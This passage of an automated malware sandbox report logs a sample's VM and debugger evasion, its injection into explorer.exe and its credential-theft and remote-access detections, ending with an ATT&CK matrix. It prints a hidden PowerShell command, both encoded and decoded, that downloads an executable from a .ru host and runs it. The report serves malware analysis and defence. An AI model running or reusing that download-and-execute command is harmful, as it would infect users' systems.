      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wbfgshsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wbfgshsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wbfgshsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wbfgshsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wbfgshsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wbfgshsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_5-4070
      Source: C:\Users\user\AppData\Roaming\wbfgshsEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_10-4166
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeAPI/Special instruction interceptor: Address: 7FF8418CE814
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeAPI/Special instruction interceptor: Address: 7FF8418CD584
      Source: C:\Users\user\AppData\Roaming\wbfgshsAPI/Special instruction interceptor: Address: 7FF8418CE814
      Source: C:\Users\user\AppData\Roaming\wbfgshsAPI/Special instruction interceptor: Address: 7FF8418CD584
      Source: oBuf.exe, 00000005.00000002.1658968275.00000000008FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4760Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5097Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 464Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 403Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 895Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 861Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep count: 4760 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep count: 5097 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -13835058055282155s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 3776Thread sleep count: 464 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6244Thread sleep count: 403 > 30Jump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00418A70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418CA4h5_2_00418A70
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_00418A70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418CA4h10_2_00418A70
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: )d2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000009.00000002.2691810923.00000000008DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000/;
      Source: explorer.exe, 00000009.00000002.2691810923.00000000008DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000o;
      Source: explorer.exe, 00000009.00000000.1644607896.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: powershell.exe, 00000004.00000002.1605660173.0000023BF6DDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: explorer.exe, 00000009.00000000.1644607896.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000009.00000000.1643693604.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2697965705.00000000094DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
      Source: explorer.exe, 00000009.00000000.1644607896.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTbrVMWare
      Source: explorer.exe, 00000009.00000000.1644607896.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}?
      Source: explorer.exe, 00000009.00000002.2697965705.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1643693604.000000000952D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000009.00000000.1643693604.00000000093B4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000009.00000002.2697965705.00000000094DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %SystemRoot%\system32\mswsock.dlldRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000009.00000000.1643693604.00000000093B4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
      Source: explorer.exe, 00000009.00000000.1644607896.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: powershell.exe, 00000004.00000002.1605660173.0000023BF6D53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllVV
      Source: explorer.exe, 00000009.00000002.2693087527.0000000002FA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\wbfgshsSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\wbfgshsDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_10-4166
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_5-4070
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\wbfgshsProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0040332A LdrLoadDll,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,NtEnumerateKey,5_2_0040332A
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_006A092B mov eax, dword ptr fs:[00000030h]5_2_006A092B
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_006A0D90 mov eax, dword ptr fs:[00000030h]5_2_006A0D90
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0090FFD4 push dword ptr fs:[00000030h]5_2_0090FFD4
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_007B092B mov eax, dword ptr fs:[00000030h]10_2_007B092B
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_007B0D90 mov eax, dword ptr fs:[00000030h]10_2_007B0D90
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_007EFEFC push dword ptr fs:[00000030h]10_2_007EFEFC

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeFile created: wbfgshs.9.drJump to dropped file
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeThread created: C:\Windows\explorer.exe EIP: B219F0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\wbfgshsThread created: unknown EIP: 88219F0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $path = $Env:temp+'\oBuf.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://bestmagazineforanimalsunicum.ru/download/svc.exe',$path); Start-Process -FilePath $path
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $path = $Env:temp+'\oBuf.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://bestmagazineforanimalsunicum.ru/download/svc.exe',$path); Start-Process -FilePath $pathJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\wbfgshsSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\wbfgshsSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\oBuf.exe "C:\Users\user\AppData\Local\Temp\oBuf.exe" Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -enc jabwageadaboacaapqagacqarqbuahyaogb0aguabqbwacsajwbcag8aqgb1agyalgblahgazqanadsaiaakagmababpaguabgb0acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqaowagacqaywbsagkazqbuahqalgbkag8adwbuagwabwbhagqazgbpagwazqaoaccaaab0ahqacaa6ac8alwbiaguacwb0ag0ayqbnageaegbpag4azqbmag8acgbhag4aaqbtageababzahuabgbpagmadqbtac4acgb1ac8azabvahcabgbsag8ayqbkac8acwb2agmalgblahgazqanacwajabwageadaboackaowagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagacqacabhahqaaaa=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -ep bypass -enc jabwageadaboacaapqagacqarqbuahyaogb0aguabqbwacsajwbcag8aqgb1agyalgblahgazqanadsaiaakagmababpaguabgb0acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqaowagacqaywbsagkazqbuahqalgbkag8adwbuagwabwbhagqazgbpagwazqaoaccaaab0ahqacaa6ac8alwbiaguacwb0ag0ayqbnageaegbpag4azqbmag8acgbhag4aaqbtageababzahuabgbpagmadqbtac4acgb1ac8azabvahcabgbsag8ayqbkac8acwb2agmalgblahgazqanacwajabwageadaboackaowagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagacqacabhahqaaaa=
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -enc jabwageadaboacaapqagacqarqbuahyaogb0aguabqbwacsajwbcag8aqgb1agyalgblahgazqanadsaiaakagmababpaguabgb0acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqaowagacqaywbsagkazqbuahqalgbkag8adwbuagwabwbhagqazgbpagwazqaoaccaaab0ahqacaa6ac8alwbiaguacwb0ag0ayqbnageaegbpag4azqbmag8acgbhag4aaqbtageababzahuabgbpagmadqbtac4acgb1ac8azabvahcabgbsag8ayqbkac8acwb2agmalgblahgazqanacwajabwageadaboackaowagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagacqacabhahqaaaa=Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -ep bypass -enc jabwageadaboacaapqagacqarqbuahyaogb0aguabqbwacsajwbcag8aqgb1agyalgblahgazqanadsaiaakagmababpaguabgb0acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqaowagacqaywbsagkazqbuahqalgbkag8adwbuagwabwbhagqazgbpagwazqaoaccaaab0ahqacaa6ac8alwbiaguacwb0ag0ayqbnageaegbpag4azqbmag8acgbhag4aaqbtageababzahuabgbpagmadqbtac4acgb1ac8azabvahcabgbsag8ayqbkac8acwb2agmalgblahgazqanacwajabwageadaboackaowagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagacqacabhahqaaaa=Jump to behavior
      Source: explorer.exe, 00000009.00000000.1641472251.0000000004460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2692355621.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2699343946.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000009.00000002.2692355621.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1639745547.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000009.00000002.2692355621.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1639745547.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
      Source: explorer.exe, 00000009.00000002.2691810923.0000000000889000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1639328782.0000000000889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
      Source: explorer.exe, 00000009.00000002.2692355621.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1639745547.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00418A70 InterlockedCompareExchange,GetFocus,ReadConsoleA,FindAtomA,SearchPathA,SetConsoleMode,SearchPathW,GetDefaultCommConfigA,CopyFileExW,CreatePipe,GetEnvironmentStringsW,WriteConsoleOutputA,GetModuleFileNameA,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmW,WaitForSingleObject,SetCommState,GetConsoleAliasesLengthW,GetComputerNameA,CopyFileW,GetFileAttributesA,GetConsoleAliasExesLengthW,GetBinaryType,FormatMessageA,GetLongPathNameA,PurgeComm,LoadLibraryA,MoveFileW,InterlockedCompareExchange,5_2_00418A70
      Source: C:\Windows\explorer.exeCode function: 9_2_00B23520 GetUserNameW,9_2_00B23520
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.1658821304.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.1658888908.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1937588498.0000000002181000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1937415520.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.1658821304.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.1658888908.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1937588498.0000000002181000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1937415520.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information22
      Scripting
      Valid Accounts1
      Native API
      22
      Scripting
      1
      DLL Side-Loading
      1
      Deobfuscate/Decode Files or Information
      OS Credential Dumping11
      System Time Discovery
      Remote Services1
      Archive Collected Data
      13
      Ingress Tool Transfer
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts2
      Exploitation for Client Execution
      1
      DLL Side-Loading
      212
      Process Injection
      13
      Obfuscated Files or Information
      LSASS Memory1
      Account Discovery
      Remote Desktop ProtocolData from Removable Media1
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Command and Scripting Interpreter
      Logon Script (Windows)Logon Script (Windows)12
      Software Packing
      Security Account Manager1
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive4
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts6
      PowerShell
      Login HookLogin Hook1
      DLL Side-Loading
      NTDS214
      System Information Discovery
      Distributed Component Object ModelInput Capture124
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
      Masquerading
      LSA Secrets611
      Security Software Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts231
      Virtualization/Sandbox Evasion
      Cached Domain Credentials231
      Virtualization/Sandbox Evasion
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items212
      Process Injection
      DCSync3
      Process Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Hidden Files and Directories
      Proc Filesystem1
      Application Window Discovery
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
      System Owner/User Discovery
      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
